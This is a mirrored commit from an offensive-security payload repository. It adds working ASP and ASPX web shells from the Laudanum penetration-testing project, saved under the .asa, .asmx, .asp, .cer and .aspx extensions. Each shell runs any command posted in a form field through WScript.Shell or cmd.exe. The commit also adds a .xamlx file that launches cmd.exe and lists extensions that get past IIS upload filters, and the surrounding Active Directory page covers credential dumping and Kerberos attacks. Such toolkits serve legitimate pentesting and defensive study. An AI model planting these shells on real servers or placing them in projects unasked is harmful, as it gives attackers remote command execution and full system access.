mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
IIS asp shell with .asa, .cer, .xamlx
This commit is contained in:
parent
639dc9faec
commit
00684a10cd
9 changed files with 547 additions and 40 deletions
|
@ -2,44 +2,64 @@
|
|||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||
* [Open Shares](#open-shares)
|
||||
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
|
||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
* Using ndtsutil
|
||||
* Using Vshadow
|
||||
* Using vssadmin
|
||||
* Using DiskShadow
|
||||
* Using Mimikatz DCSync
|
||||
* Using Mimikatz sekurlsa
|
||||
* [Password spraying](#password-spraying)
|
||||
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
|
||||
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
|
||||
* [Kerberoasting](#kerberoasting)
|
||||
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
|
||||
* [Pass-the-Hash](#pass-the-hash)
|
||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
* [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||
* [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
|
||||
* [Drop the MIC](#drop-the-mic)
|
||||
* [Ghost Potato](#ghost-potato)
|
||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
* [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||
* [Unconstrained delegation](#unconstrained-delegation)
|
||||
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
||||
* [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||
* [PrivExchange attack](#privexchange-attack)
|
||||
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
|
||||
* [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
* [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
|
||||
- [Active Directory Attacks](#active-directory-attacks)
|
||||
- [Summary](#summary)
|
||||
- [Tools](#tools)
|
||||
- [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||
- [Open Shares](#open-shares)
|
||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||
- [Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||
- [Using ndtsutil](#using-ndtsutil)
|
||||
- [Using Vshadow](#using-vshadow)
|
||||
- [Using vssadmin](#using-vssadmin)
|
||||
- [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
|
||||
- [Using esentutl.exe](#using-esentutlexe)
|
||||
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
|
||||
- [Alternatives - modules](#alternatives---modules)
|
||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||
- [Password spraying](#password-spraying)
|
||||
- [Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.](#using-kerbrute-a-tool-to-perform-kerberos-pre-auth-bruteforcing)
|
||||
- [Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.](#using-crackmapexec-and-mp64-to-generate-passwords-and-spray-them-against-smb-services-on-the-network)
|
||||
- [Using RDPassSpray to target RDP services.](#using-rdpassspray-to-target-rdp-services)
|
||||
- [Using [hydra]() and [ncrack]() to target RDP services.](#using-hydra-and-ncrack-to-target-rdp-services)
|
||||
- [Password in AD User comment](#password-in-ad-user-comment)
|
||||
- [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
|
||||
- [Using Mimikatz](#using-mimikatz)
|
||||
- [Using Meterpreter](#using-meterpreter)
|
||||
- [Using a ticket on Linux](#using-a-ticket-on-linux)
|
||||
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
|
||||
- [Kerberoasting](#kerberoasting)
|
||||
- [KRB_AS_REP Roasting](#krbasrep-roasting)
|
||||
- [Pass-the-Hash](#pass-the-hash)
|
||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
- [Using impacket](#using-impacket)
|
||||
- [Using Rubeus](#using-rubeus)
|
||||
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
- [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||
- [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
|
||||
- [Drop the MIC](#drop-the-mic)
|
||||
- [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||
- [Unconstrained delegation](#unconstrained-delegation)
|
||||
- [Find delegation](#find-delegation)
|
||||
- [Monitor with Rubeus](#monitor-with-rubeus)
|
||||
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
|
||||
- [Load the ticket](#load-the-ticket)
|
||||
- [Mitigation](#mitigation)
|
||||
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||
- [PrivExchange attack](#privexchange-attack)
|
||||
- [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
|
||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
- [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
|
@ -824,6 +844,16 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
|||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
|
||||
* Disable LLMNR via group policy
|
||||
```powershell
|
||||
Open gpedit.msc and navigate to Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution and set to Enabled
|
||||
```
|
||||
* Disable NBT-NS
|
||||
```powershell
|
||||
This can be achieved by navigating through the GUI to Network card > Properties > IPv4 > Advanced > WINS and then under "NetBIOS setting" select Disable NetBIOS over TCP/IP
|
||||
```
|
||||
|
||||
#### SMB Signing Disabled and IPv6
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
<configuration>
|
||||
<system.webServer>
|
||||
<handlers accessPolicy="Read, Script, Write">
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64″ />
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||
</handlers>
|
||||
<security>
|
||||
<requestFiltering>
|
||||
|
|
83
Upload Insecure Files/Extension ASP/shell.asa
Normal file
83
Upload Insecure Files/Extension ASP/shell.asa
Normal file
|
@ -0,0 +1,83 @@
|
|||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** Updated and fixed by Robin Wood <Digininja>
|
||||
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
|
||||
' can set this to 0 for never time out but don't want to kill the server if a script
|
||||
' goes into a loop for any reason
|
||||
Server.ScriptTimeout = 180
|
||||
|
||||
ip=request.ServerVariables("REMOTE_ADDR")
|
||||
if ip<>"1.2.3.4" then
|
||||
response.Status="404 Page Not Found"
|
||||
response.Write(response.Status)
|
||||
response.End
|
||||
end if
|
||||
|
||||
if Request.Form("submit") <> "" then
|
||||
Dim wshell, intReturn, strPResult
|
||||
cmd = Request.Form("cmd")
|
||||
Response.Write ("Running command: " & cmd & "<br />")
|
||||
set wshell = CreateObject("WScript.Shell")
|
||||
Set objCmd = wShell.Exec(cmd)
|
||||
strPResult = objCmd.StdOut.Readall()
|
||||
|
||||
response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
|
||||
|
||||
set wshell = nothing
|
||||
end if
|
||||
|
||||
%>
|
||||
<html>
|
||||
<head><title>Laundanum ASP Shell</title></head>
|
||||
<body onload="document.shell.cmd.focus()">
|
||||
<form action="shell.asp" method="POST" name="shell">
|
||||
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
|
||||
<input type="submit" name="submit" value="Submit" />
|
||||
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
|
||||
<p>Example command to do a directory listing:<br>
|
||||
%ComSpec% /c dir
|
||||
</form>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
83
Upload Insecure Files/Extension ASP/shell.asmx
Normal file
83
Upload Insecure Files/Extension ASP/shell.asmx
Normal file
|
@ -0,0 +1,83 @@
|
|||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** Updated and fixed by Robin Wood <Digininja>
|
||||
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
|
||||
' can set this to 0 for never time out but don't want to kill the server if a script
|
||||
' goes into a loop for any reason
|
||||
Server.ScriptTimeout = 180
|
||||
|
||||
ip=request.ServerVariables("REMOTE_ADDR")
|
||||
if ip<>"1.2.3.4" then
|
||||
response.Status="404 Page Not Found"
|
||||
response.Write(response.Status)
|
||||
response.End
|
||||
end if
|
||||
|
||||
if Request.Form("submit") <> "" then
|
||||
Dim wshell, intReturn, strPResult
|
||||
cmd = Request.Form("cmd")
|
||||
Response.Write ("Running command: " & cmd & "<br />")
|
||||
set wshell = CreateObject("WScript.Shell")
|
||||
Set objCmd = wShell.Exec(cmd)
|
||||
strPResult = objCmd.StdOut.Readall()
|
||||
|
||||
response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
|
||||
|
||||
set wshell = nothing
|
||||
end if
|
||||
|
||||
%>
|
||||
<html>
|
||||
<head><title>Laundanum ASP Shell</title></head>
|
||||
<body onload="document.shell.cmd.focus()">
|
||||
<form action="shell.asp" method="POST" name="shell">
|
||||
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
|
||||
<input type="submit" name="submit" value="Submit" />
|
||||
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
|
||||
<p>Example command to do a directory listing:<br>
|
||||
%ComSpec% /c dir
|
||||
</form>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
83
Upload Insecure Files/Extension ASP/shell.asp
Normal file
83
Upload Insecure Files/Extension ASP/shell.asp
Normal file
|
@ -0,0 +1,83 @@
|
|||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** Updated and fixed by Robin Wood <Digininja>
|
||||
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
|
||||
' can set this to 0 for never time out but don't want to kill the server if a script
|
||||
' goes into a loop for any reason
|
||||
Server.ScriptTimeout = 180
|
||||
|
||||
ip=request.ServerVariables("REMOTE_ADDR")
|
||||
if ip<>"1.2.3.4" then
|
||||
response.Status="404 Page Not Found"
|
||||
response.Write(response.Status)
|
||||
response.End
|
||||
end if
|
||||
|
||||
if Request.Form("submit") <> "" then
|
||||
Dim wshell, intReturn, strPResult
|
||||
cmd = Request.Form("cmd")
|
||||
Response.Write ("Running command: " & cmd & "<br />")
|
||||
set wshell = CreateObject("WScript.Shell")
|
||||
Set objCmd = wShell.Exec(cmd)
|
||||
strPResult = objCmd.StdOut.Readall()
|
||||
|
||||
response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
|
||||
|
||||
set wshell = nothing
|
||||
end if
|
||||
|
||||
%>
|
||||
<html>
|
||||
<head><title>Laundanum ASP Shell</title></head>
|
||||
<body onload="document.shell.cmd.focus()">
|
||||
<form action="shell.asp" method="POST" name="shell">
|
||||
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
|
||||
<input type="submit" name="submit" value="Submit" />
|
||||
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
|
||||
<p>Example command to do a directory listing:<br>
|
||||
%ComSpec% /c dir
|
||||
</form>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
129
Upload Insecure Files/Extension ASP/shell.aspx
Normal file
129
Upload Insecure Files/Extension ASP/shell.aspx
Normal file
|
@ -0,0 +1,129 @@
|
|||
<%@ Page Language="C#"%>
|
||||
<%@ Import Namespace="System" %>
|
||||
|
||||
<script runat="server">
|
||||
|
||||
/* *****************************************************************************
|
||||
***
|
||||
*** Laudanum Project
|
||||
*** A Collection of Injectable Files used during a Penetration Test
|
||||
***
|
||||
*** More information is available at:
|
||||
*** http://laudanum.secureideas.net
|
||||
*** laudanum@secureideas.net
|
||||
***
|
||||
*** Project Leads:
|
||||
*** Kevin Johnson <kjohnson@secureideas.net>
|
||||
*** Tim Medin <tim@securitywhole.com>
|
||||
***
|
||||
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
***
|
||||
********************************************************************************
|
||||
***
|
||||
*** This file provides shell access to the system.
|
||||
***
|
||||
********************************************************************************
|
||||
*** This program is free software; you can redistribute it and/or
|
||||
*** modify it under the terms of the GNU General Public License
|
||||
*** as published by the Free Software Foundation; either version 2
|
||||
*** of the License, or (at your option) any later version.
|
||||
***
|
||||
*** This program is distributed in the hope that it will be useful,
|
||||
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
*** GNU General Public License for more details.
|
||||
***
|
||||
*** You can get a copy of the GNU General Public License from this
|
||||
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
***
|
||||
***************************************************************************** */
|
||||
|
||||
string stdout = "";
|
||||
string stderr = "";
|
||||
|
||||
void die() {
|
||||
//HttpContext.Current.Response.Clear();
|
||||
HttpContext.Current.Response.StatusCode = 404;
|
||||
HttpContext.Current.Response.StatusDescription = "Not Found";
|
||||
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
|
||||
HttpContext.Current.Server.ClearError();
|
||||
HttpContext.Current.Response.End();
|
||||
}
|
||||
|
||||
void Page_Load(object sender, System.EventArgs e) {
|
||||
|
||||
// Check for an IP in the range we want
|
||||
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
|
||||
|
||||
// check if the X-Fordarded-For header exits
|
||||
string remoteIp;
|
||||
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
|
||||
remoteIp = Request.UserHostAddress;
|
||||
} else {
|
||||
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
|
||||
}
|
||||
|
||||
bool validIp = false;
|
||||
foreach (string ip in allowedIps) {
|
||||
validIp = (validIp || (remoteIp == ip));
|
||||
}
|
||||
|
||||
if (!validIp) {
|
||||
die();
|
||||
}
|
||||
|
||||
if (Request.Form["c"] != null) {
|
||||
// do or do not, there is no try
|
||||
//try {
|
||||
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
|
||||
// "/c" tells cmd that we want it to execute the command that follows, and exit.
|
||||
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
|
||||
|
||||
// The following commands are needed to redirect the standard output and standard error.
|
||||
procStartInfo.RedirectStandardOutput = true;
|
||||
procStartInfo.RedirectStandardError = true;
|
||||
procStartInfo.UseShellExecute = false;
|
||||
// Do not create the black window.
|
||||
procStartInfo.CreateNoWindow = true;
|
||||
// Now we create a process, assign its ProcessStartInfo and start it
|
||||
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||
p.StartInfo = procStartInfo;
|
||||
p.Start();
|
||||
// Get the output and error into a string
|
||||
stdout = p.StandardOutput.ReadToEnd();
|
||||
stderr = p.StandardError.ReadToEnd();
|
||||
//}
|
||||
//catch (Exception objException)
|
||||
//{
|
||||
}
|
||||
}
|
||||
</script>
|
||||
<html>
|
||||
<head><title>Laundanum ASPX Shell</title></head>
|
||||
<body onload="document.shell.c.focus()">
|
||||
|
||||
<form method="post" name="shell">
|
||||
cmd /c <input type="text" name="c"/>
|
||||
<input type="submit"><br/>
|
||||
STDOUT:<br/>
|
||||
<pre><% = stdout.Replace("<", "<") %></pre>
|
||||
<br/>
|
||||
<br/>
|
||||
<br/>
|
||||
STDERR:<br/>
|
||||
<pre><% = stderr.Replace("<", "<") %></pre>
|
||||
|
||||
|
||||
</form>
|
||||
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
|
||||
</body>
|
||||
</html>
|
83
Upload Insecure Files/Extension ASP/shell.cer
Normal file
83
Upload Insecure Files/Extension ASP/shell.cer
Normal file
|
@ -0,0 +1,83 @@
|
|||
<%
|
||||
' *******************************************************************************
|
||||
' ***
|
||||
' *** Laudanum Project
|
||||
' *** A Collection of Injectable Files used during a Penetration Test
|
||||
' ***
|
||||
' *** More information is available at:
|
||||
' *** http://laudanum.secureideas.net
|
||||
' *** laudanum@secureideas.net
|
||||
' ***
|
||||
' *** Project Leads:
|
||||
' *** Kevin Johnson <kjohnson@secureideas.net
|
||||
' *** Tim Medin <tim@securitywhole.com>
|
||||
' ***
|
||||
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' ***
|
||||
' *** Updated and fixed by Robin Wood <Digininja>
|
||||
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
|
||||
' ***
|
||||
' ********************************************************************************
|
||||
' *** This program is free software; you can redistribute it and/or
|
||||
' *** modify it under the terms of the GNU General Public License
|
||||
' *** as published by the Free Software Foundation; either version 2
|
||||
' *** of the License, or (at your option) any later version.
|
||||
' ***
|
||||
' *** This program is distributed in the hope that it will be useful,
|
||||
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
' *** GNU General Public License for more details.
|
||||
' ***
|
||||
' *** You can get a copy of the GNU General Public License from this
|
||||
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||
' *** You can also write to the Free Software Foundation, Inc., Temple
|
||||
' *** Place - Suite Boston, MA USA.
|
||||
' ***
|
||||
' ***************************************************************************** */
|
||||
|
||||
|
||||
' can set this to 0 for never time out but don't want to kill the server if a script
|
||||
' goes into a loop for any reason
|
||||
Server.ScriptTimeout = 180
|
||||
|
||||
ip=request.ServerVariables("REMOTE_ADDR")
|
||||
if ip<>"1.2.3.4" then
|
||||
response.Status="404 Page Not Found"
|
||||
response.Write(response.Status)
|
||||
response.End
|
||||
end if
|
||||
|
||||
if Request.Form("submit") <> "" then
|
||||
Dim wshell, intReturn, strPResult
|
||||
cmd = Request.Form("cmd")
|
||||
Response.Write ("Running command: " & cmd & "<br />")
|
||||
set wshell = CreateObject("WScript.Shell")
|
||||
Set objCmd = wShell.Exec(cmd)
|
||||
strPResult = objCmd.StdOut.Readall()
|
||||
|
||||
response.write "<br><pre>" & replace(replace(strPResult,"<","<"),vbCrLf,"<br>") & "</pre>"
|
||||
|
||||
set wshell = nothing
|
||||
end if
|
||||
|
||||
%>
|
||||
<html>
|
||||
<head><title>Laundanum ASP Shell</title></head>
|
||||
<body onload="document.shell.cmd.focus()">
|
||||
<form action="shell.asp" method="POST" name="shell">
|
||||
Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
|
||||
<input type="submit" name="submit" value="Submit" />
|
||||
<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
|
||||
<p>Example command to do a directory listing:<br>
|
||||
%ComSpec% /c dir
|
||||
</form>
|
||||
<hr/>
|
||||
<address>
|
||||
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||
Written by Tim Medin.<br/>
|
||||
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||
</address>
|
||||
</body>
|
||||
</html>
|
16
Upload Insecure Files/Extension ASP/shell.xamlx
Normal file
16
Upload Insecure Files/Extension ASP/shell.xamlx
Normal file
|
@ -0,0 +1,16 @@
|
|||
<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
|
||||
<p:Sequence DisplayName="Sequential Service">
|
||||
<TransactedReceiveScope Request="{x:Reference __r0}">
|
||||
<p1:Sequence >
|
||||
<SendReply DisplayName="SendResponse" >
|
||||
<SendReply.Request>
|
||||
<Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
|
||||
</SendReply.Request>
|
||||
<SendMessageContent>
|
||||
<p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()]</p1:InArgument>
|
||||
</SendMessageContent>
|
||||
</SendReply>
|
||||
</p1:Sequence>
|
||||
</TransactedReceiveScope>
|
||||
</p:Sequence>
|
||||
</WorkflowService>
|
|
@ -46,7 +46,7 @@ Double extensions
|
|||
### Other extensions
|
||||
|
||||
```powershell
|
||||
asp : .asp, .aspx
|
||||
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
|
||||
perl: .pl, .pm, .cgi, .lib
|
||||
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
|
||||
Coldfusion: .cfm, .cfml, .cfc, .dbm
|
||||
|
|
Loading…
Reference in a new issue